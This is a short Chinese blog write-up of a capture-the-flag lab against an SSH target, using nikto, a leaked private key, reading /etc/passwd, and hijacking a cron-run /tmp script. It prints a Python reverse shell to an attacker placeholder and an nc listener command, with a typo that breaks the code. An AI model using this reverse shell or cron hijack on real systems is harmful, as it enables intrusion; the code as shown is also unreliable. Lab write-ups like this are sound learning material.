CTF-SSH服务渗透
2024-10-06 11:48:52
环境
Kali ip 192.168.56.102
Smb 靶机ip 192.168.56.101
0x01信息探测
首页发现有类似用户名的信息 先记录下来
Martin N
Hadi M
Jimmy S
Nikto进行对http服务的信息探测
发现rsa敏感密钥文件 wget到kali下
重命名为id_rsa 作为我们ssh的登录的私钥
通过前面收集类似的用户名 作为ssh登录尝试
将私钥文件权限改成可读可写
登录成功
查看有哪些用户名
0x02 提升权限 查找flag
cat /etc/passwd 查看所有用户的列表
cat /etc/group 查看用户组
find / -user 用户名 查看属于某些用户的文件
/tmp 查看缓冲文件目录
查看所有用户的列表
查看用户组
查看缓冲文件目录
因为缓冲文件目录下的文件都是隐藏 需要使用ls -alh查看
通过 /etc/crontab 文件,设定系统定期执行的任务,编辑,需要root权限。不同的用户都可以有不同的定时任务
查看计划文件
可以发现
Jimmy用户定期执行python /tmp/sekurity.py文件
我们可以把执行的文件改成我们的python反弹shell
#!/usr/bin/python
import os,subprocess,socket
s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“攻击机IP地址”,”攻击机监听端口”))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call([“/bin/sh”,”-i”])
通过ssh上传至我们的靶机
然后通过nc -lvp 端口 进行shell监听
最新文章
- BZOJ 1047 二维单调队列
- javascript--Math相关
- py-faster-rcnn +cudnn V5
- AngularJS Select(选择框)
- Python 7 —— 扩展与嵌入
- MySQL5:性能优化
- C#入门基础三四
- Inventory of the materials to teach you how to query a date certain combination of dimensions
- [JAVA词形还原工具]Snowball
- python install 2.7.10
- javascript 倒计时跳转.
- [Leetcode][016] 3Sum Closest (Java)
- 一个Hadoop难以查找的错误
- fdisk添加磁盘
- 修改nagios密码和遇到的问题
- Okio 之初探黄龙
- Java .classpath文件Classpath entry org.maven.eclipse.MAVEN2_CLASSPATH_CONTAINER will not be exported or published异常解决办法
- golang子进程的启动和停止,mac与linux的区别
- PHP语言学习之php-fpm 三种运行模式
- C#窗口禁止移动的方法
热门文章
- 利用HBuilder打包Vue开发的webapp为app
- android 拍照 相册 剪切以及显示功能
- 基于DevExpress的SpreadsheetControl实现对Excel的打开、预览、保存、另存为、打印(附源码下载)
- 【学习笔记】第四章 Python3核心技术与实践--列表与元组
- react navigation goBack()返回到任意页面(不集成redux) 二
- (一)spring 高级装配-@Profile
- 2019年9月3日安卓凯立德全分辨率(路况)夏季版C3551-C7M24-3K21J25懒人包
- [C++]类的设计(2)——拷贝控制(析构和三五法则)
- FPGA 开发详细流程你了解吗?
- 判断java中最多的词组